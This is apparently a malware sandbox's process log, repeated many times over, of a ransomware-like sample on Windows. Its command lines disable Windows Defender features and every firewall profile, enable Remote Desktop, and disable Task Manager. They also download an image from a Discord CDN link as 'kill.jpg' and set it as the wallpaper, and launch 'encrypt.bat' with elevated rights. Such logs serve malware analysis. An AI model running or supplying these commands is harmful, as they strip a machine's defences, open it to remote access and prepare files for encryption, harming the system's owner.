reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

